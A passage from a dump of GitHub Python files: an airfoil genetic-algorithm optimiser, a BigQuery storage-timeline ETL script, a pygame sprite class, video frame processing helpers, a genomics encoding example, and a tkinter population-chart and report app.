ind.fitness.valid]\n        fitnesses = toolbox.map(toolbox.evaluate, invalid_ind)\n        for ind, fit in zip(invalid_ind, fitnesses):\n            ind.fitness.values = fit\n\n        #Selection\n        # Select the next generation population from parents and offspring\n        pop = toolbox.select(pop + offspring, MU)\n\n\n        print(\"------objs_before-------\")\n        print(obj1_max,obj2_max,obj3_max)\n        #Get the current maxima\n        pop_fit = numpy.array([ind.fitness.values for ind in pop])\n        fits1 = [obj[0] for obj in pop_fit]\n        _obj1_max = max(fits1)\n        fits2 = [obj[1] for obj in pop_fit]\n        _obj2_max = max(fits2)\n        fits3 = [obj[2] for obj in pop_fit]\n        _obj3_max = max(fits3)\n\n        #Normalize according to the maxima\n        if _obj1_max <= 1.0:\n            obj1_max = _obj1_max\n        if _obj2_max <= 1.0:\n            obj2_max = _obj2_max\n        if _obj3_max <= 1.0:\n            obj3_max = _obj3_max\n\n        print(\"------objs_after-------\")\n        print(obj1_max,obj2_max,obj3_max)\n\n        #======================================================\n        #---------Plot intermediate progress----------\n\n        ##Write out the top airfoils every generation\n        k = 0\n        for ind in pop[:10]:\n            global code_division\n            ratios = decoder(ind,code_division)\n            try:\n                k += 1\n                datlist_list = [fc.read_datfile(file) for file in datfiles]\n                datlist_shaped_list = [fc.shape_dat(datlist) for datlist in datlist_list]\n                newdat = fc.interpolate_dat(datlist_shaped_list,ratios)\n                fc.write_datfile(datlist=newdat,newfile_name = \"newfoil\"+str(k)+str(\".dat\"))\n            except Exception as e:\n                print(\"message:{0}\".format(e))\n        #\n\n        ##Print the evaluation values of each airfoil\n        k = 0\n        for ind, fit in zip(pop, pop_fit):\n            try:\n                k += 1\n                print(k)\n                print(\"individual:\" + str(ind) + \"\\nfit:\" + str(fit))\n            except Exception as e:\n                print(\"message:{0}\".format(e))\n        #\n\n        plt.cla()#clear the axes\n        ##Draw the new airfoil\n        datlist_list = [fc.read_datfile(file) for file in 
datfiles]\n        datlist_shaped_list = [fc.shape_dat(datlist) for datlist in datlist_list]\n        newdat = fc.interpolate_dat(datlist_shaped_list,decoder(pop[0],code_division))\n        fc.write_datfile(datlist=newdat,newfile_name = \"./foil_dat_gen/newfoil_gen\"+str(gen)+str(\".dat\"))\n        plt.title('generation:'+str(gen))\n        newdat_x = [dat[0] for dat in newdat]\n        newdat_y = [dat[1] for dat in newdat]\n        plt.xlim([0,1])\n        plt.ylim([-0.5,0.5])\n        plt.plot(newdat_x,newdat_y)\n        plt.savefig(\"./newfoil_gen/newfoil_gen\"+str(gen)+\".png\")\n        plt.draw()#render\n        plt.pause(0.1)#wait for the rendering\n\n        ##Plot the evaluation values\n        fig = plt.figure(figsize=(7, 7))\n        ax = fig.add_subplot(111, projection=\"3d\")\n        p = [ind.fitness.values for ind in pop]\n        p1 = [i[0] for i in p]\n        p2 = [j[1] for j in p]\n        p3 = [k[2] for k in p]\n        ax.set_xlim(0,obj1_max)\n        ax.set_ylim(0,obj2_max)\n        ax.set_zlim(0,obj3_max)\n        ax.scatter(p1, p2, p3, marker=\"o\", s=24, label=\"Final Population\")\n        ref = tools.uniform_reference_points(NOBJ, P)\n        ax.scatter(ref[:, 0], ref[:, 1], ref[:, 2], marker=\"o\", s=24, label=\"Reference Points\")\n        ax.view_init(elev=11, azim=-25)\n        #ax.autoscale(tight=True)\n        plt.legend()\n        plt.title(\"nsga3_gen:\"+str(gen))\n        plt.tight_layout()\n        plt.savefig(\"./nsga3_gen/nsga3_gen\"+str(gen)+\".png\")\n        plt.close()\n        #======================================================\n\n\n        # Compile statistics about the new population\n        record = stats.compile(pop)\n        logbook.record(gen=gen, evals=len(invalid_ind), **record)\n        print(logbook.stream)\n\n    return pop, logbook\n\n\nif __name__ == \"__main__\":\n    try:\n        pop, stats = main()\n    except KeyboardInterrupt:\n        print(\"Stopped with Ctrl + C\")\n        pass\n\n    pop_fit = numpy.array([ind.fitness.values for ind in pop])\n\n    k = 0\n    for ind, fit in zip(pop[:10], pop_fit[:10]):\n        try:\n            k += 1\n            datlist_list = [fc.read_datfile(file) for file in datfiles]\n            datlist_shaped_list = [fc.shape_dat(datlist) for datlist in datlist_list]\n            newdat = fc.interpolate_dat(datlist_shaped_list,decoder(ind,code_division))\n            fc.write_datfile(datlist=newdat,newfile_name = \"newfoil\"+str(k)+str(\".dat\"))\n        except Exception as e:\n            print(\"message:{0}\".format(e))\n    k = 0\n    for ind, fit in zip(pop, pop_fit):\n        try:\n            k += 1\n            print(k)\n            print(\"individual:\" + str(ind) + \"\\nfit:\" + str(fit))\n        except Exception as e:\n            print(\"message:{0}\".format(e))\n\n    #pf = problem.pareto_front(ref_points)\n    #print(igd(pop_fit, pf))\n\n    fig = plt.figure(figsize=(7, 7))\n    ax = fig.add_subplot(111, projection=\"3d\")\n\n    p = numpy.array([ind.fitness.values for ind in pop])\n    ax.scatter(p[:, 0], p[:, 1], p[:, 2], marker=\"o\", s=24, label=\"Final Population\")\n\n    #ax.scatter(pf[:, 0], pf[:, 1], pf[:, 2], marker=\"x\", c=\"k\", s=32, label=\"Ideal Pareto Front\")\n\n    ref_points = tools.uniform_reference_points(NOBJ, P)\n\n    ax.scatter(ref_points[:, 0], ref_points[:, 1], ref_points[:, 2], marker=\"o\", s=24, label=\"Reference Points\")\n\n    ax.view_init(elev=11, azim=-25)\n    ax.autoscale(tight=True)\n    plt.legend()\n    plt.tight_layout()\n    plt.savefig(\"nsga3.png\")\n","repo_name":"melonTai/foilOpt","sub_path":"multiprocessing/main_xfexe.py","file_name":"main_xfexe.py","file_ext":"py","file_size_in_byte":14019,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"33044813314","text":"\"\"\"\nDetermine BigQuery table storage timeline per day.\n\nTo read more on the source table, please visit:\nhttps://cloud.google.com/bigquery/docs/information-schema-table-storage-timeline\n\"\"\"\n\n
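# Illustrative invocation (added note; the flags match the argparse definitions below):\n#   python query.py --date 2023-06-01 --project moz-fx-data-shared-prod\n\nfrom argparse import 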
ArgumentParser\n\nfrom google.cloud import bigquery\n\nDEFAULT_PROJECTS = [\n \"mozdata\",\n \"moz-fx-data-shared-prod\",\n \"moz-fx-data-marketing-prod\",\n]\n\nparser = ArgumentParser(description=__doc__)\nparser.add_argument(\"--date\", required=True) # expect string with format yyyy-mm-dd\nparser.add_argument(\"--project\", default=\"moz-fx-data-shared-prod\")\n# projects queries were run from that access table\nparser.add_argument(\"--source_projects\", nargs=\"+\", default=DEFAULT_PROJECTS)\nparser.add_argument(\"--destination_dataset\", default=\"monitoring_derived\")\nparser.add_argument(\n \"--destination_table\", default=\"bigquery_table_storage_timeline_daily_v1\"\n)\n\n\ndef create_query(date, source_project):\n \"\"\"Create query for a source project. 1GB = POW(1024, 3) bytes.\"\"\"\n return f\"\"\"\n SELECT\n DATE('{date}') AS change_date,\n project_id,\n table_schema AS dataset_id,\n table_name AS table_id,\n deleted,\n DATE(creation_time) AS creation_date,\n count(*) AS change_count,\n avg(total_rows) AS avg_total_rows,\n avg(total_partitions) AS avg_total_partitions,\n avg(total_logical_bytes) AS avg_total_logical_bytes,\n avg(active_logical_bytes) AS avg_active_logical_bytes,\n avg(long_term_logical_bytes) AS avg_long_term_logical_bytes,\n avg(total_physical_bytes) AS avg_total_physical_bytes,\n avg(active_physical_bytes) AS avg_active_physical_bytes,\n avg(long_term_physical_bytes) AS avg_long_term_physical_bytes,\n avg(time_travel_physical_bytes) AS avg_time_travel_physical_bytes\n FROM `{source_project}.region-us.INFORMATION_SCHEMA.TABLE_STORAGE_TIMELINE`\n WHERE\n DATE(timestamp) = '{date}'\n GROUP BY change_date, project_id, dataset_id, table_id, deleted, creation_date\n ORDER BY change_date, project_id, dataset_id, table_id, deleted, creation_date\n \"\"\"\n\n\ndef main():\n \"\"\"Run query for each source project.\"\"\"\n args = parser.parse_args()\n\n partition = args.date.replace(\"-\", \"\")\n destination_table = f\"{args.project}.{args.destination_dataset}.{args.destination_table}${partition}\"\n\n # remove old partition in case of re-run\n client = bigquery.Client(args.project)\n client.delete_table(destination_table, not_found_ok=True)\n\n for project in args.source_projects:\n client = bigquery.Client(project)\n query = create_query(args.date, project)\n job_config = bigquery.QueryJobConfig(\n destination=destination_table, write_disposition=\"WRITE_APPEND\"\n )\n client.query(query, job_config=job_config).result()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"mozilla/bigquery-etl","sub_path":"sql/moz-fx-data-shared-prod/monitoring_derived/bigquery_table_storage_timeline_daily_v1/query.py","file_name":"query.py","file_ext":"py","file_size_in_byte":2907,"program_lang":"python","lang":"en","doc_type":"code","stars":210,"dataset":"github-code","pt":"31"} +{"seq_id":"19877879414","text":"import pygame\nimport random\nfrom pygame.math import Vector2\n\ncell_size = 16\ncell_number = 30\n\nclass Rocket:\n def __init__(self, mode) -> None:\n self.mode = mode\n self.sprite = self.sprite()\n self.randomize()\n self.acc = 0.05\n\n def sprite(self):\n if self.mode == 0:\n return pygame.image.load(\"Assets/Spear.png\")\n elif self.mode == 1:\n return pygame.image.load(\"Assets/Spear.png\")\n\n def randomize(self):\n self.x = random.randint(0, cell_number - 1)\n self.y = 0\n self.position = Vector2(self.x, self.y)\n \n def move(self):\n self.y += 1 * self.acc\n self.position = Vector2(self.x, self.y)\n\n def out_of_frame(self):\n return self.position.y * 
cell_size <= 800\n    \n    def draw_rocket(self, Surface):\n        # NOTE: despite its name, out_of_frame() returns True while the rocket is still\n        # inside the 800px-high frame, so the rocket only moves while it is visible.\n        if self.out_of_frame():\n            self.move()\n        self.rocket_rect = pygame.Rect(int(self.position.x * cell_size), int(self.position.y * cell_size), cell_size, cell_size * 3)\n        self.small_rect = pygame.Rect(int(self.position.x * cell_size), int(self.position.y * cell_size) + cell_size + cell_size, cell_size, cell_size)\n\n        if self.mode == 0:\n            for i in range(3):\n                rect = pygame.Rect(int(self.position.x * cell_size), int(self.position.y * cell_size) + i * cell_size, cell_size, cell_size)\n                Surface.blit(self.sprite, rect)\n        \n        elif self.mode == 1:\n            pygame.draw.rect(Surface, pygame.Color('Black'), self.rocket_rect)","repo_name":"Reda-BELHAJ/SnakeImproved","sub_path":"Classes/Rocket.py","file_name":"Rocket.py","file_ext":"py","file_size_in_byte":1563,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"12883284921","text":"from glob import glob\nimport os\nimport shutil\nimport ffmpeg\nimport cv2\n\ndef pre_image(args):\n\n    if not args['in_image']:\n        return args\n    \n    img = args['in_image']\n    if not os.path.exists(img):\n        print('Image Not Found')\n        exit()\n\n    pref = '.video_cache/tmp/'\n\n    if os.path.exists(pref):\n        shutil.rmtree(pref)\n\n    os.makedirs(pref)\n    shutil.copy(img, pref + \"img_0.png\")\n    shutil.copy(img, pref + \"img_1.png\")\n    shutil.copy(img, pref + \"img_2.png\")\n    args['in_path'] = pref\n    args['out_path'] = pref + '/out/'\n    args['in_video'] = args['out_video'] = None\n    return args\n\ndef post_image(args):\n    \n    if not args['out_image']:\n        return\n    \n    pref = glob('.video_cache/tmp/out/*.png')\n    if not args['out_image']:\n        shutil.copy(pref[0], \"./out.png\")\n    \n    shutil.copy(pref[0], args['out_image'])\n    shutil.rmtree('.video_cache/tmp')\n\ndef pre_process(args):\n    \n    if not args['in_video']:\n        return args\n\n    video = args['in_video']\n    if not os.path.exists(video):\n        print(\"Video Not Found\")\n        exit(1)\n\n    if not os.path.exists(\".video_cache\"):\n        os.makedirs(\".video_cache\")\n\n    vname = os.path.basename(video)\n    dir_template = f\".video_cache/{vname}_IN/\"\n    if os.path.exists(dir_template):\n        shutil.rmtree(dir_template)\n    os.makedirs(dir_template)\n\n    v0 = cv2.VideoCapture(video)\n    now = 0\n    writeT = dir_template + \"I\"\n    while v0.isOpened():\n        ret, Frame = v0.read()\n        if not ret:\n            break\n        cv2.imwrite(writeT + now.__str__() + \".jpg\", Frame)\n        now += 1\n    v0.release()\n    cv2.destroyAllWindows()\n\n    args['in_path'] = dir_template\n    if args['out_video']:\n        args['out_path'] = f\".video_cache/{vname}_out/\"\n    return args\n\ndef post_process(args):\n\n    if not args['out_video']:\n        return args\n\n    out_video = args[\"out_video\"]\n    if os.path.exists(out_video):\n        shutil.move(out_video, f\"{out_video}_old\")\n\n    op = args['in_path'] \\\n        or args['in_video'] \\\n        or print('Error: No output type given') \\\n        and exit(2)\n\n    vname = os.path.basename(op)\n    opath = f\"{args['out_path']}/*.png\" \\\n        or f\".video_cache/{vname}_out/*.png\"\n\n    ffmpeg.input(\n        opath\n        , pattern_type='glob'\n        , framerate=20).output(out_video).run()","repo_name":"nageshnero/Video-Noise-reduction","sub_path":"process_video.py","file_name":"process_video.py","file_ext":"py","file_size_in_byte":2384,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"42145360562","text":"#!/usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\nimport os\r\nimport subprocess\r\nimport sys\r\n\r\n\r\ncmd_subfolder = os.path.dirname(os.path.abspath(__file__))\r\n
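# Note (added): walk up the directory tree until the path ends with the package name;\r\n# the extra dirname after the loop then points at the directory containing the package.\r\nwhile not 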
cmd_subfolder .endswith('pydeepgenomics'):\r\n cmd_subfolder = os.path.dirname(cmd_subfolder)\r\ncmd_subfolder = os.path.dirname(cmd_subfolder)\r\ntry:\r\n from pydeepgenomics.preprocess import encoding, settings\r\n from pydeepgenomics.preprocess.vcf import vcf\r\n from pydeepgenomics.tools import generaltools as gt\r\nexcept ImportError:\r\n if cmd_subfolder not in sys.path:\r\n sys.path.append(cmd_subfolder)\r\n from pydeepgenomics.preprocess import encoding, settings\r\n from pydeepgenomics.preprocess.vcf import vcf\r\n from pydeepgenomics.tools import generaltools as gt\r\n\r\nPATH_TO_PLAYGROUND = os.path.join(\r\n os.path.dirname(os.path.abspath(__file__)),\r\n \"playground\")\r\n\r\n\r\ndef example_2(VERBOSE=True):\r\n subprocess.call(\r\n \"python \"+os.path.join(os.path.dirname(__file__), \"setup_ex_env.py\"),\r\n shell=True)\r\n list_chrs = gt.list_elements(\r\n PATH_TO_PLAYGROUND,\r\n type_=\"file\",\r\n extension=\".vcf.gz\")\r\n list_chrs = [os.path.basename(i).split(\".\")[0] for i in list_chrs]\r\n\r\n vcf.split_vcf_files(PATH_TO_PLAYGROUND, verbose=False)\r\n\r\n for chr_to_be_processed in list_chrs:\r\n print(\r\n \"###########################################\\n\" +\r\n \"Processing chr {}\".format(chr_to_be_processed))\r\n path_to_data = os.path.join(\r\n PATH_TO_PLAYGROUND, \"split_by_chr\", str(chr_to_be_processed))\r\n encoding.encode_file_positions(\r\n chr_to_be_processed,\r\n path_to_data,\r\n PATH_TO_PLAYGROUND,\r\n verbose=VERBOSE)\r\n encoding.verify_decoding(\r\n os.path.join(PATH_TO_PLAYGROUND, \"split_by_chr\"),\r\n os.path.join(PATH_TO_PLAYGROUND, \"encoded_files\"),\r\n str(chr_to_be_processed),\r\n nb_of_tests_per_file=10,\r\n max_nb_of_files_to_test=100,\r\n verbose=VERBOSE)\r\n\r\nif __name__ == \"__main__\":\r\n example_2()\r\n","repo_name":"digitalepidemiologylab/pydeepgenomics","sub_path":"pydeepgenomics/preprocess/examples/2_encode_genotypes.py","file_name":"2_encode_genotypes.py","file_ext":"py","file_size_in_byte":2089,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"16700443341","text":"import json\nimport os\nimport sqlite3\nimport sys\nimport textwrap\nimport tkinter as tk\nfrom tkinter import *\nfrom tkinter import ttk\nimport docx\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom PIL import Image, ImageTk\nfrom docx.enum.text import WD_PARAGRAPH_ALIGNMENT\n\nconnection = sqlite3.connect('database.db')\n\n\ndef read_json_file(file_path):\n with open(file_path, 'r', encoding='utf-8') as file:\n data = json.load(file)\n return data\n\n\ndef get_column_names(data):\n column_names = set()\n\n def extract_keys(obj):\n if isinstance(obj, dict):\n column_names.update(obj.keys())\n for value in obj.values():\n extract_keys(value)\n elif isinstance(obj, list):\n for item in obj:\n extract_keys(item)\n\n extract_keys(data)\n return column_names\n\n\ndef create_table(db_connection, table_name, columns):\n columns_with_types = ', '.join(f'{column} TEXT' for column in columns)\n create_table_query = f'CREATE TABLE IF NOT EXISTS {table_name} ({columns_with_types})'\n cursor = db_connection.cursor()\n cursor.execute(f\"DROP TABLE IF EXISTS {table_name}\")\n cursor.execute(create_table_query)\n\n\ndef insert_data(db_connection, table_name, data, columns):\n cursor = db_connection.cursor()\n\n def insert_rows(obj):\n if isinstance(obj, dict):\n values = [obj.get(column, '') for column in columns]\n cursor.execute(f'INSERT INTO {table_name} VALUES ({\",\".join([\"?\"] * len(columns))})', 
values)\n        elif isinstance(obj, list):\n            for item in obj:\n                insert_rows(item)\n\n    insert_rows(data)\n    db_connection.commit()\n\n\ndef select_all_data(db_connection, table_name):\n    cursor = db_connection.cursor()\n    cursor.execute(f\"SELECT * FROM {table_name}\")\n    rows = cursor.fetchall()\n    return rows\n\n\ndef db_manager():\n    json_data = read_json_file('data.json')\n    columns = list(get_column_names(json_data))\n    create_table(connection, 'my_table', columns)\n    insert_data(connection, 'my_table', json_data, columns)\n\n    rows = select_all_data(connection, 'my_table')\n    print(columns)\n\n\ndef select_countries():\n    cursor = connection.cursor()\n    cursor.execute(\"SELECT country FROM my_table\")\n    countries = []\n    rows = cursor.fetchall()\n    for row in rows:\n        countries.append(row[0])\n\n    return countries\n\n\ndef get_plot_dict(country):\n    cursor = connection.cursor()\n    cursor.execute(\"SELECT pop1980,pop2000,pop2010,pop2022,pop2023,pop2030,pop2050 FROM my_table WHERE country = ?\",\n                   (country,))\n    row = cursor.fetchone()\n    data_dict = {}\n\n    if row is not None:\n        column_names = [1980, 2000, 2010, 2022, 2023, 2030, 2050]\n\n        for i, column in enumerate(column_names):\n            value = row[i]\n            if value.isdigit():\n                data_dict[column] = int(value)\n            else:\n                data_dict[column] = float(value)\n\n    return data_dict\n\n\ndef draw_chart(dictionary, country, plot_type):\n    filtered_data = {key: value for key, value in dictionary.items() if value != 0}\n    print(\"In draw function\")\n    x = list(filtered_data.keys())\n    y = list(filtered_data.values())\n\n    plt.figure(figsize=(10, 6))\n    plt.ylim(0, max(y))  # set the limits after creating the figure so they apply to it\n    plt.xlabel(\"Year\")\n    plt.ylabel(\"Population\")\n    plt.title(\"Population by year in \" + country)\n    plt.ticklabel_format(style='plain')  # Disable scaling on y-axis\n\n    if plot_type == \"Bar chart\":\n        plt.bar(x, y)\n    elif plot_type == \"Line chart\":\n        plt.plot(x, y)\n    elif plot_type == \"Pie chart\":\n        plt.pie(y, labels=x)\n    else:\n        raise ValueError(\"Invalid chart type provided.\")\n\n    plt.savefig(\"plot.png\")\n\n\ndef get_general_plot_dict(year):\n    cursor = connection.cursor()\n    cursor.execute(f\"SELECT country, pop{year} FROM my_table\")\n    rows = cursor.fetchall()\n    data_dict = {row[0]: row[1] for row in rows}\n    return data_dict\n\n\ndef draw_general_plot(dict, plot_type, year):\n    filtered_data = {key: value for key, value in dict.items() if value != 0}\n    x = list(filtered_data.keys())\n    y = [float(value) for value in filtered_data.values()]\n\n    plt.figure(figsize=(10, 6))\n    plt.ylim(0, max(y))\n    plt.ylabel(\"Population\")\n    plt.xticks([])  # Remove x-axis labels\n    plt.yticks(np.arange(10_000_000, max(y) + max(y) / 10, 50_000_000))\n    plt.ticklabel_format(style='plain')  # Disable scaling on y-axis\n\n    plt.title(f\"Population by year in {year}\")\n\n    if plot_type == \"Bar chart\":\n        plt.bar(x, y)\n    elif plot_type == \"Line chart\":\n        plt.plot(x, y)\n    elif plot_type == \"Pie chart\":\n        plt.pie(y, labels=x)\n    else:\n        raise ValueError(\"Invalid chart type provided.\")\n\n    plt.savefig(\"plot.png\")\n\n\ndef resize_image(imagename, width, height):\n    image = Image.open(imagename)\n    resized_image = image.resize((width, height))\n\n    tk_image = ImageTk.PhotoImage(resized_image)\n\n    return tk_image\n\n\ndef calculate_aggregation(arguments):\n    cursor = connection.cursor()\n\n    def average_population():\n        years = [1980, 2000, 2010, 2022, 2023, 2030, 2050]\n        avg_population_dict = {year: 0 for year in years}\n\n        
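# Note (added): total and i are re-initialized inside the loop so that each\n        # year's average only covers that year's rows.\n        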
for year in years:\n            total = 0\n            cursor.execute(f\"SELECT pop{year} FROM my_table\")\n            rows = cursor.fetchall()\n            i = 0\n            for row in rows:\n                total += int(row[0])\n                i += 1\n\n            avg_population_dict[year] = int(total / i)\n        return avg_population_dict\n\n    def maximal_population():\n        years = [1980, 2000, 2010, 2022, 2023, 2030, 2050]\n        population_dict = {year: 0 for year in years}\n\n        for year in years:\n            max_val = 0\n            country = \"\"\n            cursor.execute(f\"SELECT pop{year}, country FROM my_table\")\n            rows = cursor.fetchall()\n            for row in rows:\n                if int(row[0]) > max_val:\n                    max_val = int(row[0])\n                    country = row[1]\n\n            population_dict[year] = f\"{max_val} in {country}\"\n        return population_dict\n\n    def minimal_population():\n        years = [1980, 2000, 2010, 2022, 2023, 2030, 2050]\n        population_dict = {year: 0 for year in years}\n\n        for year in years:\n            min_val = sys.maxsize\n            min_country = \"\"\n            cursor.execute(f\"SELECT pop{year}, country FROM my_table\")\n            rows = cursor.fetchall()\n            for row in rows:\n                if int(row[0]) < min_val:\n                    min_val = int(row[0])\n                    min_country = row[1]\n\n            population_dict[year] = f\"{min_val} in {min_country}\"\n        return population_dict\n\n    def max(arg):\n        max_val = 0\n        country = ''\n        cursor.execute(f\"SELECT country, {arg} FROM my_table\")\n        rows = cursor.fetchall()\n        for row in rows:\n            if float(row[1]) > max_val:\n                max_val = float(row[1])\n                country = row[0]\n\n        return country, max_val\n\n    def min(arg):\n        min_val = sys.maxsize\n        country = ''\n        cursor.execute(f\"SELECT country, {arg} FROM my_table\")\n        rows = cursor.fetchall()\n        for row in rows:\n            if float(row[1]) < min_val:\n                min_val = float(row[1])\n                country = row[0]\n\n        return country, min_val\n\n    output = \"\"\n    for arg in arguments:\n        if len(arg.split(\" \")) == 2:\n            function, argument = arg.split(\" \")\n            if function == \"Maximal\":\n                output += f\"Maximal {argument}: \" + str(max(argument)) + \"\\n\"\n            elif function == \"Minimal\":\n                output += f\"Minimal {argument}: \" + str(min(argument)) + \"\\n\"\n        elif arg == \"Maximal population by year\":\n            output += \"Maximal population by year: \\n\"\n            for key, value in maximal_population().items():\n                output += f\"{key}: {value} \\n\"\n        elif arg == \"Minimal population by year\":\n            output += \"Minimal population by year: \\n\"\n            for key, value in minimal_population().items():\n                output += f\"{key}: {value} \\n\"\n        elif arg == \"Average population by year\":\n            output += \"Average population by year: \\n\"\n            for key, value in average_population().items():\n                output += f\"{key}: {value} \\n\"\n    return output\n\n\ndef generate_report(docx_name, paragraph_dict):\n    if os.path.exists(docx_name):\n        filename, extension = os.path.splitext(docx_name)\n        count = 1\n        while os.path.exists(f\"{filename}({count}){extension}\"):\n            count += 1\n\n        docx_name = f\"{filename}({count}){extension}\"\n\n    document = docx.Document()\n\n    title_paragraph = document.add_paragraph()\n    title_paragraph_run = title_paragraph.add_run(\"Countries analyser\")\n    title_paragraph_run.bold = True\n    title_paragraph_run.font.size = docx.shared.Pt(22)\n    title_paragraph.alignment = WD_PARAGRAPH_ALIGNMENT.CENTER\n\n    report_author_paragraph = document.add_paragraph()\n    report_author_paragraph_run = report_author_paragraph.add_run(\"Bohdan Kyryliuk\")\n    report_author_paragraph_run.font.size = docx.shared.Pt(18)\n    report_author_paragraph.alignment = WD_PARAGRAPH_ALIGNMENT.CENTER\n\n    author_paragraph = document.add_paragraph()\n    author_paragraph_run = author_paragraph.add_run(\"267855\")\n    author_paragraph_run.font.size = docx.shared.Pt(18)\n    author_paragraph.alignment = WD_PARAGRAPH_ALIGNMENT.CENTER\n\n    document.add_page_break()\n\n    plot_paragraph = document.add_paragraph()\n    plot_paragraph_run = plot_paragraph.add_run()\n    image = Image.open(\"plot.png\")\n    resized_image = image.resize((400, 400))\n    resized_image.save(\"resized_plot.png\")\n    plot_paragraph_run.add_picture(\"resized_plot.png\")\n\n    plot_report = paragraph_dict\n    plot_report_paragraph = document.add_paragraph()\n    plot_report_paragraph_run = plot_report_paragraph.add_run(plot_report)\n    plot_report_paragraph_run.font.size = docx.shared.Pt(18)\n\n    document.save(docx_name)\n\n\ndef create_main_window():\n    main_window = tk.Tk()\n    screen_width = main_window.winfo_screenwidth()\n    screen_height = main_window.winfo_screenheight()\n    main_window_x = (screen_width - 1000) // 2\n    main_window_y = (screen_height - 700) // 2\n    main_window.geometry(f\"{1000}x{700}+{main_window_x}+{main_window_y - 50}\")\n    selected_checkboxes = []\n    status_line_canvas = None\n\n    main_window.title(\"Chart\")\n    main_window.resizable(False, False)\n\n    def create_statistics_combo_box():\n        combo = tk.ttk.Combobox(main_window, state=\"readonly\")\n        combo_items = ['General'] + select_countries()\n        combo['values'] = combo_items\n        combo.place(x=30, y=45)\n        combo.current(0)  # Set the default selected option\n        global selected_country\n        selected_country = \"General\"\n        create_year_combo_box(True)\n\n        def on_chart_select(event):\n            global selected_country\n            selected_country = combo.get()\n            if selected_country == \"General\":\n                create_year_combo_box(True)\n            else:\n                create_year_combo_box(False)\n\n        combo.bind('<<ComboboxSelected>>', on_chart_select)\n\n    def create_chart_type_combo_box():\n        combo = tk.ttk.Combobox(main_window, state=\"readonly\")\n        combo['values'] = [\"Bar chart\", \"Line chart\", \"Pie chart\"]\n        combo.place(x=30, y=105)\n        combo.current(0)  # Set the default selected option\n        global selected_plot_type\n        selected_plot_type = \"Bar chart\"\n\n        # Function to handle the chart selection\n        def on_chart_select(event):\n            global selected_plot_type\n            selected_plot_type = combo.get()\n\n        combo.bind('<<ComboboxSelected>>', on_chart_select)\n\n    def create_year_combo_box(enabled):\n        combo = tk.ttk.Combobox(main_window, state=\"readonly\")\n        combo['values'] = [\"1980\", \"2000\", \"2010\", \"2022\", \"2023\", \"2030\", \"2050\"]\n        combo.place(x=30, y=165)\n        combo.current(0)  # Set the default selected option\n        if enabled:\n            combo[\"state\"] = \"enabled\"\n        else:\n            combo[\"state\"] = \"disabled\"\n        global selected_year\n        selected_year = \"1980\"\n\n        # Function to handle the chart selection\n        def on_chart_select(event):\n            global selected_year\n            selected_year = combo.get()\n\n        combo.bind('<<ComboboxSelected>>', on_chart_select)\n\n    def create_labels():\n        label_combo = tk.Label(main_window, text=\"Choose chart statistics\")\n        label_combo.place(x=30, y=15)\n\n        label_chart_type = tk.Label(main_window, text=\"Choose chart type\")\n        label_chart_type.place(x=30, y=75)\n\n        label_year = tk.Label(main_window, text=\"Choose year\")\n        label_year.place(x=30, y=135)\n\n        label_filename_text = tk.Label(main_window, text=\"Enter report name\")\n        label_filename_text.place(x=30, y=527)\n\n    def create_buttons():\n        button_aggregation = tk.Button(main_window, text=\"Display aggregation\", command=on_button_aggregation_clicked,\n                                       width=19, height=1)\n        button_aggregation.place(x=30, y=493)\n\n        button_chart = tk.Button(main_window, text=\"Draw chart\", command=on_button_chart_clicked, width=19, height=1)\n        button_chart.place(x=30, y=195)\n\n        button_generate_report = tk.Button(main_window, text=\"Generate report\",\n                                           command=on_button_generate_report_clicked, width=19, height=1)\n        
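# Note (added): the click handler below falls back to \"report.docx\" when the name field is left empty.\n        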
button_generate_report.place(x=30, y=583)\n\n button_settings = tk.Button(main_window, text=\"Settings\", command=draw_chart, width=19, height=1)\n button_settings.place(x=30, y=613)\n\n def create_text_fields():\n global filename_text_field\n filename_text_field = tk.Entry(main_window, width=23, bg='white')\n filename_text_field.place(x=30, y=557)\n\n def on_button_chart_clicked():\n if selected_country != \"General\":\n update_status_line(f\"{selected_plot_type} about {selected_country} population has been generated successfully!\")\n draw_chart(get_plot_dict(selected_country), selected_country, selected_plot_type)\n else:\n update_status_line(f\"General {selected_plot_type} of population in {selected_year} has been generated successfully!\")\n draw_general_plot(get_general_plot_dict(int(selected_year)), selected_plot_type, int(selected_year))\n\n global image\n image = resize_image(\"plot.png\", 766, 560)\n\n create_main_canvas().create_image(0, 0, anchor=tk.NW, image=image)\n\n def on_button_aggregation_clicked():\n global selected_checkboxes\n canvas = create_main_canvas()\n x_coordinate, y_coordinate = 10, 10\n canvas.delete(\"all\")\n text = calculate_aggregation(selected_checkboxes)\n\n update_status_line(f\"Aggregation about {selected_checkboxes} has been generated successfully!\")\n\n canvas.create_text(x_coordinate + 10, y_coordinate, text=text, anchor=tk.NW, font=(\"Tahoma\", 11))\n\n def on_button_generate_report_clicked():\n global filename_text, selected_checkboxes\n if filename_text_field.get() == \"\":\n filename_text = \"report.docx\"\n else:\n filename_text = filename_text_field.get() + \".docx\"\n if 'selected_checkboxes' not in globals():\n selected_checkboxes = []\n\n update_status_line(f\"Report {filename_text} has been generated successfully!\")\n\n generate_report(filename_text, calculate_aggregation(selected_checkboxes))\n\n def create_checkboxes():\n checkboxes = {}\n y_coordinate = 225\n # Create the checkboxes\n checkbox_texts = [\"Maximal population by year\", \"Minimal population by year\", \"Average population by year\",\n \"Maximal area\", \"Minimal area\", \"Maximal density\", \"Minimal density\", \"Maximal growthRate\",\n \"Minimal growthRate\"]\n\n def update_selected_checkboxes():\n global selected_checkboxes\n selected_checkboxes = [text for text, checkbox_var in checkboxes.items() if checkbox_var.get()]\n update_status_line(f\"User selected {selected_checkboxes}\")\n\n for text in checkbox_texts:\n checkbox_var = tk.BooleanVar()\n checkbox = tk.Checkbutton(main_window, text=text, variable=checkbox_var, command=update_selected_checkboxes)\n checkbox.place(x=30, y=y_coordinate)\n y_coordinate += 30\n checkboxes[text] = checkbox_var\n\n def create_main_canvas():\n main_canvas = tk.Canvas(main_window, width=765, height=560, bg=\"#e6e6e6\")\n 